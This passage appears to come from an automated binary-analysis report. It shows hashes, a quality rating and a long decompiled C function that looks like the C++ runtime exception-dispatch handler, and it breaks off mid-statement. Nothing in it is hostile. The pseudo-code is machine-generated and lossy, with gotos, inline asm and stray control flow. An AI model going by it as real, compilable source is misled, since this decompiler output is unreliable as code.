                                                                                                                                                                                      • Instruction ID: b60c11e8d4fe5f43c3c19266498d1ed26c07e56518d337e21d8a55f65fc2f9ba
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bda7ee4f025edb1cb2fae988b1c64033e79d8c7b012b34688b3d6bd02c0f3a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 250245B0904A299FDB10CFE4C954BDEBBB9BF49304F208529D415AB380D775E94ACF94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                                      			E6E9EF6F6(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                                                                                                                                                      				signed char* _v0;
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                      				void _v64;
                                                                                                                                                                                      				signed int _v68;
                                                                                                                                                                                      				char _v84;
                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                                                      				void _v104;
                                                                                                                                                                                      				intOrPtr* _v112;
                                                                                                                                                                                      				signed char* _v184;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void* _t202;
                                                                                                                                                                                      				signed int _t203;
                                                                                                                                                                                      				char _t204;
                                                                                                                                                                                      				signed int _t206;
                                                                                                                                                                                      				signed int _t208;
                                                                                                                                                                                      				signed char* _t209;
                                                                                                                                                                                      				signed int _t210;
                                                                                                                                                                                      				signed int _t211;
                                                                                                                                                                                      				signed int _t215;
                                                                                                                                                                                      				void* _t218;
                                                                                                                                                                                      				signed char* _t221;
                                                                                                                                                                                      				void* _t223;
                                                                                                                                                                                      				void* _t225;
                                                                                                                                                                                      				signed char _t229;
                                                                                                                                                                                      				signed int _t230;
                                                                                                                                                                                      				void* _t232;
                                                                                                                                                                                      				void* _t235;
                                                                                                                                                                                      				void* _t238;
                                                                                                                                                                                      				signed char _t245;
                                                                                                                                                                                      				signed int _t250;
                                                                                                                                                                                      				void* _t253;
                                                                                                                                                                                      				signed int* _t255;
                                                                                                                                                                                      				signed int _t256;
                                                                                                                                                                                      				intOrPtr _t257;
                                                                                                                                                                                      				signed int _t258;
                                                                                                                                                                                      				void* _t263;
                                                                                                                                                                                      				void* _t268;
                                                                                                                                                                                      				void* _t269;
                                                                                                                                                                                      				signed int _t273;
                                                                                                                                                                                      				signed char* _t274;
                                                                                                                                                                                      				intOrPtr* _t275;
                                                                                                                                                                                      				signed char _t276;
                                                                                                                                                                                      				signed int _t277;
                                                                                                                                                                                      				signed int _t278;
                                                                                                                                                                                      				intOrPtr* _t280;
                                                                                                                                                                                      				signed int _t281;
                                                                                                                                                                                      				signed int _t282;
                                                                                                                                                                                      				signed int _t287;
                                                                                                                                                                                      				signed int _t294;
                                                                                                                                                                                      				signed int _t295;
                                                                                                                                                                                      				signed int _t298;
                                                                                                                                                                                      				signed int _t300;
                                                                                                                                                                                      				signed char* _t301;
                                                                                                                                                                                      				signed int _t302;
                                                                                                                                                                                      				signed int _t303;
                                                                                                                                                                                      				signed int* _t305;
                                                                                                                                                                                      				signed char* _t308;
                                                                                                                                                                                      				signed int _t318;
                                                                                                                                                                                      				signed int _t319;
                                                                                                                                                                                      				signed int _t321;
                                                                                                                                                                                      				signed int _t330;
                                                                                                                                                                                      				void* _t332;
                                                                                                                                                                                      				void* _t334;
                                                                                                                                                                                      				void* _t335;
                                                                                                                                                                                      				void* _t336;
                                                                                                                                                                                      				void* _t337;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t300 = __edx;
                                                                                                                                                                                      				_push(_t319);
                                                                                                                                                                                      				_t305 = _a20;
                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                      				_v28 = 0;
                                                                                                                                                                                      				_t279 = E6E9F0658(_a8, _a16, _t305);
                                                                                                                                                                                      				_t335 = _t334 + 0xc;
                                                                                                                                                                                      				_v12 = _t279;
                                                                                                                                                                                      				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
                                                                                                                                                                                      					L66:
                                                                                                                                                                                      					_t202 = E6E9F1C23(_t274, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      					asm("int3");
                                                                                                                                                                                      					_t332 = _t335;
                                                                                                                                                                                      					_t336 = _t335 - 0x38;
                                                                                                                                                                                      					_push(_t274);
                                                                                                                                                                                      					_t275 = _v112;
                                                                                                                                                                                      					__eflags =  *_t275 - 0x80000003;
                                                                                                                                                                                      					if( *_t275 == 0x80000003) {
                                                                                                                                                                                      						return _t202;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_push(_t319);
                                                                                                                                                                                      						_push(_t305);
                                                                                                                                                                                      						_t203 = E6E9EF3B1(_t275, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      						__eflags =  *(_t203 + 8);
                                                                                                                                                                                      						if( *(_t203 + 8) != 0) {
                                                                                                                                                                                      							__imp__EncodePointer(0);
                                                                                                                                                                                      							_t319 = _t203;
                                                                                                                                                                                      							_t223 = E6E9EF3B1(_t275, _t279, _t300, 0, _t319);
                                                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
                                                                                                                                                                                      							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
                                                                                                                                                                                      								__eflags =  *_t275 - 0xe0434f4d;
                                                                                                                                                                                      								if( *_t275 != 0xe0434f4d) {
                                                                                                                                                                                      									__eflags =  *_t275 - 0xe0434352;
                                                                                                                                                                                      									if( *_t275 != 0xe0434352) {
                                                                                                                                                                                      										_t215 = E6E9EEBF7(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
                                                                                                                                                                                      										_t336 = _t336 + 0x1c;
                                                                                                                                                                                      										__eflags = _t215;
                                                                                                                                                                                      										if(_t215 != 0) {
                                                                                                                                                                                      											L83:
                                                                                                                                                                                      											return _t215;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t204 = _a16;
                                                                                                                                                                                      						_v28 = _t204;
                                                                                                                                                                                      						_v24 = 0;
                                                                                                                                                                                      						__eflags =  *(_t204 + 0xc);
                                                                                                                                                                                      						if( *(_t204 + 0xc) > 0) {
                                                                                                                                                                                      							_push(_a24);
                                                                                                                                                                                      							E6E9EEB2A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
                                                                                                                                                                                      							_t302 = _v40;
                                                                                                                                                                                      							_t337 = _t336 + 0x18;
                                                                                                                                                                                      							_t215 = _v44;
                                                                                                                                                                                      							_v20 = _t215;
                                                                                                                                                                                      							_v12 = _t302;
                                                                                                                                                                                      							__eflags = _t302 - _v32;
                                                                                                                                                                                      							if(_t302 >= _v32) {
                                                                                                                                                                                      								goto L83;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t281 = _t302 * 0x14;
                                                                                                                                                                                      							__eflags = _t281;
                                                                                                                                                                                      							_v16 = _t281;
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								_t282 = 5;
                                                                                                                                                                                      								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
                                                                                                                                                                                      								_t337 = _t337 + 0xc;
                                                                                                                                                                                      								__eflags = _v64 - _t218;
                                                                                                                                                                                      								if(_v64 > _t218) {
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t218 - _v60;
                                                                                                                                                                                      								if(_t218 > _v60) {
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
                                                                                                                                                                                      								_t287 = _t221[4];
                                                                                                                                                                                      								__eflags = _t287;
                                                                                                                                                                                      								if(_t287 == 0) {
                                                                                                                                                                                      									L80:
                                                                                                                                                                                      									__eflags =  *_t221 & 0x00000040;
                                                                                                                                                                                      									if(( *_t221 & 0x00000040) == 0) {
                                                                                                                                                                                      										_push(0);
                                                                                                                                                                                      										_push(1);
                                                                                                                                                                                      										E6E9EF676(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
                                                                                                                                                                                      										_t302 = _v12;
                                                                                                                                                                                      										_t337 = _t337 + 0x30;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *((char*)(_t287 + 8));
                                                                                                                                                                                      								if( *((char*)(_t287 + 8)) != 0) {
                                                                                                                                                                                      									goto L82;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L80;
                                                                                                                                                                                      								L82:
                                                                                                                                                                                      								_t302 = _t302 + 1;
                                                                                                                                                                                      								_t215 = _v20;
                                                                                                                                                                                      								_t281 = _v16 + 0x14;
                                                                                                                                                                                      								_v12 = _t302;
                                                                                                                                                                                      								_v16 = _t281;
                                                                                                                                                                                      								__eflags = _t302 - _v32;
                                                                                                                                                                                      							} while (_t302 < _v32);
                                                                                                                                                                                      							goto L83;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E6E9F1C23(_t275, _t279, _t300, 0, _t319);
                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                      						_push(_t332);
                                                                                                                                                                                      						_t301 = _v184;
                                                                                                                                                                                      						_push(_t275);
                                                                                                                                                                                      						_push(_t319);
                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                      						_t206 = _t301[4];
                                                                                                                                                                                      						__eflags = _t206;
                                                                                                                                                                                      						if(_t206 == 0) {
                                                                                                                                                                                      							L108:
                                                                                                                                                                                      							_t208 = 1;
                                                                                                                                                                                      							__eflags = 1;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t280 = _t206 + 8;
                                                                                                                                                                                      							__eflags =  *_t280;
                                                                                                                                                                                      							if( *_t280 == 0) {
                                                                                                                                                                                      								goto L108;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eflags =  *_t301 & 0x00000080;
                                                                                                                                                                                      								_t308 = _v0;
                                                                                                                                                                                      								if(( *_t301 & 0x00000080) == 0) {
                                                                                                                                                                                      									L90:
                                                                                                                                                                                      									_t276 = _t308[4];
                                                                                                                                                                                      									_t321 = 0;
                                                                                                                                                                                      									__eflags = _t206 - _t276;
                                                                                                                                                                                      									if(_t206 == _t276) {
                                                                                                                                                                                      										L100:
                                                                                                                                                                                      										__eflags =  *_t308 & 0x00000002;
                                                                                                                                                                                      										if(( *_t308 & 0x00000002) == 0) {
                                                                                                                                                                                      											L102:
                                                                                                                                                                                      											_t209 = _a4;
                                                                                                                                                                                      											__eflags =  *_t209 & 0x00000001;
                                                                                                                                                                                      											if(( *_t209 & 0x00000001) == 0) {
                                                                                                                                                                                      												L104:
                                                                                                                                                                                      												__eflags =  *_t209 & 0x00000002;
                                                                                                                                                                                      												if(( *_t209 & 0x00000002) == 0) {
                                                                                                                                                                                      													L106:
                                                                                                                                                                                      													_t321 = 1;
                                                                                                                                                                                      													__eflags = 1;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eflags =  *_t301 & 0x00000002;
                                                                                                                                                                                      													if(( *_t301 & 0x00000002) != 0) {
                                                                                                                                                                                      														goto L106;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags =  *_t301 & 0x00000001;
                                                                                                                                                                                      												if(( *_t301 & 0x00000001) != 0) {
                                                                                                                                                                                      													goto L104;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											__eflags =  *_t301 & 0x00000008;
                                                                                                                                                                                      											if(( *_t301 & 0x00000008) != 0) {
                                                                                                                                                                                      												goto L102;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t208 = _t321;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t185 = _t276 + 8; // 0x6e
                                                                                                                                                                                      										_t210 = _t185;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											_t277 =  *_t280;
                                                                                                                                                                                      											__eflags = _t277 -  *_t210;
                                                                                                                                                                                      											if(_t277 !=  *_t210) {
                                                                                                                                                                                      												break;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = _t277;
                                                                                                                                                                                      											if(_t277 == 0) {
                                                                                                                                                                                      												L96:
                                                                                                                                                                                      												_t211 = _t321;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t278 =  *((intOrPtr*)(_t280 + 1));
                                                                                                                                                                                      												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
                                                                                                                                                                                      												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
                                                                                                                                                                                      													break;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t280 = _t280 + 2;
                                                                                                                                                                                      													_t210 = _t210 + 2;
                                                                                                                                                                                      													__eflags = _t278;
                                                                                                                                                                                      													if(_t278 != 0) {
                                                                                                                                                                                      														continue;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L96;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L98:
                                                                                                                                                                                      											__eflags = _t211;
                                                                                                                                                                                      											if(_t211 == 0) {
                                                                                                                                                                                      												goto L100;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t208 = 0;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L109;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                                                                      										_t211 = _t210 | 0x00000001;
                                                                                                                                                                                      										__eflags = _t211;
                                                                                                                                                                                      										goto L98;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									__eflags =  *_t308 & 0x00000010;
                                                                                                                                                                                      									if(( *_t308 & 0x00000010) != 0) {
                                                                                                                                                                                      										goto L108;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L90;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L109:
                                                                                                                                                                                      						return _t208;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t274 = _a4;
                                                                                                                                                                                      					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
                                                                                                                                                                                      						L22:
                                                                                                                                                                                      						_t300 = _a12;
                                                                                                                                                                                      						_v8 = _t300;
                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t319 = 0;
                                                                                                                                                                                      						if(_t274[0x1c] != 0) {
                                                                                                                                                                                      							goto L22;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t225 = E6E9EF3B1(_t274, _t279, _t300, _t305, 0);
                                                                                                                                                                                      							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
                                                                                                                                                                                      								L60:
                                                                                                                                                                                      								return _t225;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t274 =  *(E6E9EF3B1(_t274, _t279, _t300, _t305, 0) + 0x10);
                                                                                                                                                                                      								_t263 = E6E9EF3B1(_t274, _t279, _t300, _t305, 0);
                                                                                                                                                                                      								_v28 = 1;
                                                                                                                                                                                      								_v8 =  *((intOrPtr*)(_t263 + 0x14));
                                                                                                                                                                                      								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
                                                                                                                                                                                      									goto L66;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									if( *((intOrPtr*)(E6E9EF3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
                                                                                                                                                                                      										L23:
                                                                                                                                                                                      										_t300 = _v8;
                                                                                                                                                                                      										_t279 = _v12;
                                                                                                                                                                                      										L24:
                                                                                                                                                                                      										_v52 = _t305;
                                                                                                                                                                                      										_v48 = 0;
                                                                                                                                                                                      										__eflags =  *_t274 - 0xe06d7363;
                                                                                                                                                                                      										if( *_t274 != 0xe06d7363) {
                                                                                                                                                                                      											L56:
                                                                                                                                                                                      											__eflags = _t305[3];
                                                                                                                                                                                      											if(_t305[3] <= 0) {
                                                                                                                                                                                      												goto L59;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags = _a24;
                                                                                                                                                                                      												if(_a24 != 0) {
                                                                                                                                                                                      													goto L66;
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_push(_a32);
                                                                                                                                                                                      													_push(_a28);
                                                                                                                                                                                      													_push(_t279);
                                                                                                                                                                                      													_push(_t305);
                                                                                                                                                                                      													_push(_a16);
                                                                                                                                                                                      													_push(_t300);
                                                                                                                                                                                      													_push(_a8);
                                                                                                                                                                                      													_push(_t274);
                                                                                                                                                                                      													L67();
                                                                                                                                                                                      													_t335 = _t335 + 0x20;
                                                                                                                                                                                      													goto L59;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											__eflags = _t274[0x10] - 3;
                                                                                                                                                                                      											if(_t274[0x10] != 3) {
                                                                                                                                                                                      												goto L56;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												__eflags = _t274[0x14] - 0x19930520;
                                                                                                                                                                                      												if(_t274[0x14] == 0x19930520) {
                                                                                                                                                                                      													L29:
                                                                                                                                                                                      													_t319 = _a32;
                                                                                                                                                                                      													__eflags = _t305[3];
                                                                                                                                                                                      													if(_t305[3] > 0) {
                                                                                                                                                                                      														_push(_a28);
                                                                                                                                                                                      														E6E9EEB2A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
                                                                                                                                                                                      														_t300 = _v64;
                                                                                                                                                                                      														_t335 = _t335 + 0x18;
                                                                                                                                                                                      														_t250 = _v68;
                                                                                                                                                                                      														_v44 = _t250;
                                                                                                                                                                                      														_v16 = _t300;
                                                                                                                                                                                      														__eflags = _t300 - _v56;
                                                                                                                                                                                      														if(_t300 < _v56) {
                                                                                                                                                                                      															_t294 = _t300 * 0x14;
                                                                                                                                                                                      															__eflags = _t294;
                                                                                                                                                                                      															_v32 = _t294;
                                                                                                                                                                                      															do {
                                                                                                                                                                                      																_t295 = 5;
                                                                                                                                                                                      																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
                                                                                                                                                                                      																_t335 = _t335 + 0xc;
                                                                                                                                                                                      																__eflags = _v104 - _t253;
                                                                                                                                                                                      																if(_v104 <= _t253) {
                                                                                                                                                                                      																	__eflags = _t253 - _v100;
                                                                                                                                                                                      																	if(_t253 <= _v100) {
                                                                                                                                                                                      																		_t298 = 0;
                                                                                                                                                                                      																		_v20 = 0;
                                                                                                                                                                                      																		__eflags = _v92;
                                                                                                                                                                                      																		if(_v92 != 0) {
                                                                                                                                                                                      																			_t255 =  *(_t274[0x1c] + 0xc);
                                                                                                                                                                                      																			_t303 =  *_t255;
                                                                                                                                                                                      																			_t256 =  &(_t255[1]);
                                                                                                                                                                                      																			__eflags = _t256;
                                                                                                                                                                                      																			_v36 = _t256;
                                                                                                                                                                                      																			_t257 = _v88;
                                                                                                                                                                                      																			_v40 = _t303;
                                                                                                                                                                                      																			_v24 = _t257;
                                                                                                                                                                                      																			do {
                                                                                                                                                                                      																				asm("movsd");
                                                                                                                                                                                      																				asm("movsd");
                                                                                                                                                                                      																				asm("movsd");
                                                                                                                                                                                      																				asm("movsd");
                                                                                                                                                                                      																				_t318 = _v36;
                                                                                                                                                                                      																				_t330 = _t303;
                                                                                                                                                                                      																				__eflags = _t330;
                                                                                                                                                                                      																				if(_t330 <= 0) {
                                                                                                                                                                                      																					goto L40;
                                                                                                                                                                                      																				} else {
                                                                                                                                                                                      																					while(1) {
                                                                                                                                                                                      																						_push(_t274[0x1c]);
                                                                                                                                                                                      																						_t258 =  &_v84;
                                                                                                                                                                                      																						_push( *_t318);
                                                                                                                                                                                      																						_push(_t258);
                                                                                                                                                                                      																						L86();
                                                                                                                                                                                      																						_t335 = _t335 + 0xc;
                                                                                                                                                                                      																						__eflags = _t258;
                                                                                                                                                                                      																						if(_t258 != 0) {
                                                                                                                                                                                      																							break;
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																						_t330 = _t330 - 1;
                                                                                                                                                                                      																						_t318 = _t318 + 4;
                                                                                                                                                                                      																						__eflags = _t330;
                                                                                                                                                                                      																						if(_t330 > 0) {
                                                                                                                                                                                      																							continue;
                                                                                                                                                                                      																						} else {
                                                                                                                                                                                      																							_t298 = _v20;
                                                                                                                                                                                      																							_t257 = _v24;
                                                                                                                                                                                      																							_t303 = _v40;
                                                                                                                                                                                      																							goto L40;
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																						goto L43;
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																					_push(_a24);
                                                                                                                                                                                      																					_push(_v28);
                                                                                                                                                                                      																					E6E9EF676(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
                                                                                                                                                                                      																					_t335 = _t335 + 0x30;
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																				L43:
                                                                                                                                                                                      																				_t300 = _v16;
                                                                                                                                                                                      																				goto L44;
                                                                                                                                                                                      																				L40:
                                                                                                                                                                                      																				_t298 = _t298 + 1;
                                                                                                                                                                                      																				_t257 = _t257 + 0x10;
                                                                                                                                                                                      																				_v20 = _t298;
                                                                                                                                                                                      																				_v24 = _t257;
                                                                                                                                                                                      																				__eflags = _t298 - _v92;
                                                                                                                                                                                      																			} while (_t298 != _v92);
                                                                                                                                                                                      																			goto L43;
                                                                                                                                                                                      																		}
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																}
                                                                                                                                                                                      																L44:
                                                                                                                                                                                      																_t300 = _t300 + 1;
                                                                                                                                                                                      																_t250 = _v44;
                                                                                                                                                                                      																_t294 = _v32 + 0x14;
                                                                                                                                                                                      																_v16 = _t300;
                                                                                                                                                                                      																_v32 = _t294;
                                                                                                                                                                                      																__eflags = _t300 - _v56;
                                                                                                                                                                                      															} while (_t300 < _v56);
                                                                                                                                                                                      															_t305 = _a20;
                                                                                                                                                                                      															_t319 = _a32;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags = _a24;
                                                                                                                                                                                      													if(__eflags != 0) {
                                                                                                                                                                                      														_push(1);
                                                                                                                                                                                      														E6E9EF131(_t274, _t305, _t319, __eflags);
                                                                                                                                                                                      														_t279 = _t274;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
                                                                                                                                                                                      													if(( *_t305 & 0x1fffffff) < 0x19930521) {
                                                                                                                                                                                      														L59:
                                                                                                                                                                                      														_t225 = E6E9EF3B1(_t274, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      														__eflags =  *(_t225 + 0x1c);
                                                                                                                                                                                      														if( *(_t225 + 0x1c) != 0) {
                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L60;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														__eflags = _t305[7];
                                                                                                                                                                                      														if(_t305[7] != 0) {
                                                                                                                                                                                      															L52:
                                                                                                                                                                                      															_t229 = _t305[8] >> 2;
                                                                                                                                                                                      															__eflags = _t229 & 0x00000001;
                                                                                                                                                                                      															if((_t229 & 0x00000001) == 0) {
                                                                                                                                                                                      																_push(_t305[7]);
                                                                                                                                                                                      																_t230 = E6E9F0105(_t274, _t305, _t319, _t274);
                                                                                                                                                                                      																_pop(_t279);
                                                                                                                                                                                      																__eflags = _t230;
                                                                                                                                                                                      																if(_t230 == 0) {
                                                                                                                                                                                      																	goto L63;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	goto L59;
                                                                                                                                                                                      																}
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																 *(E6E9EF3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
                                                                                                                                                                                      																_t238 = E6E9EF3B1(_t274, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      																_t290 = _v8;
                                                                                                                                                                                      																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
                                                                                                                                                                                      																goto L61;
                                                                                                                                                                                      															}
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															_t245 = _t305[8] >> 2;
                                                                                                                                                                                      															__eflags = _t245 & 0x00000001;
                                                                                                                                                                                      															if((_t245 & 0x00000001) == 0) {
                                                                                                                                                                                      																goto L59;
                                                                                                                                                                                      															} else {
                                                                                                                                                                                      																__eflags = _a28;
                                                                                                                                                                                      																if(_a28 != 0) {
                                                                                                                                                                                      																	goto L59;
                                                                                                                                                                                      																} else {
                                                                                                                                                                                      																	goto L52;
                                                                                                                                                                                      																}
                                                                                                                                                                                      															}
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													__eflags = _t274[0x14] - 0x19930521;
                                                                                                                                                                                      													if(_t274[0x14] == 0x19930521) {
                                                                                                                                                                                      														goto L29;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														__eflags = _t274[0x14] - 0x19930522;
                                                                                                                                                                                      														if(_t274[0x14] != 0x19930522) {
                                                                                                                                                                                      															goto L56;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_v16 =  *((intOrPtr*)(E6E9EF3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
                                                                                                                                                                                      										_t268 = E6E9EF3B1(_t274, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      										_push(_v16);
                                                                                                                                                                                      										 *(_t268 + 0x1c) = _t319;
                                                                                                                                                                                      										_t269 = E6E9F0105(_t274, _t305, _t319, _t274);
                                                                                                                                                                                      										_pop(_t290);
                                                                                                                                                                                      										if(_t269 != 0) {
                                                                                                                                                                                      											goto L23;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											_t305 = _v16;
                                                                                                                                                                                      											_t356 =  *_t305 - _t319;
                                                                                                                                                                                      											if( *_t305 <= _t319) {
                                                                                                                                                                                      												L61:
                                                                                                                                                                                      												E6E9F1BCC(_t274, _t290, _t300, _t305, _t319, __eflags);
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
                                                                                                                                                                                      													if(E6E9EFD99( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6ea2e0c0) != 0) {
                                                                                                                                                                                      														goto L62;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													_t319 = _t319 + 0x10;
                                                                                                                                                                                      													_t273 = _v20 + 1;
                                                                                                                                                                                      													_v20 = _t273;
                                                                                                                                                                                      													_t356 = _t273 -  *_t305;
                                                                                                                                                                                      													if(_t273 >=  *_t305) {
                                                                                                                                                                                      														goto L61;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														continue;
                                                                                                                                                                                      													}
                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L62:
                                                                                                                                                                                      											_push(1);
                                                                                                                                                                                      											_push(_t274);
                                                                                                                                                                                      											E6E9EF131(_t274, _t305, _t319, __eflags);
                                                                                                                                                                                      											_t279 =  &_v64;
                                                                                                                                                                                      											E6E9EFD81( &_v64);
                                                                                                                                                                                      											E6E9EE95C( &_v64, 0x6ea2b17c);
                                                                                                                                                                                      											L63:
                                                                                                                                                                                      											 *(E6E9EF3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
                                                                                                                                                                                      											_t232 = E6E9EF3B1(_t274, _t279, _t300, _t305, _t319);
                                                                                                                                                                                      											_t279 = _v8;
                                                                                                                                                                                      											 *(_t232 + 0x14) = _v8;
                                                                                                                                                                                      											__eflags = _t319;
                                                                                                                                                                                      											if(_t319 == 0) {
                                                                                                                                                                                      												_t319 = _a8;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											E6E9EED1D(_t279, _t319, _t274);
                                                                                                                                                                                      											E6E9F0005(_a8, _a16, _t305);
                                                                                                                                                                                      											_t235 = E6E9F01C2(_t305);
                                                                                                                                                                                      											_t335 = _t335 + 0x10;
                                                                                                                                                                                      											_push(_t235);
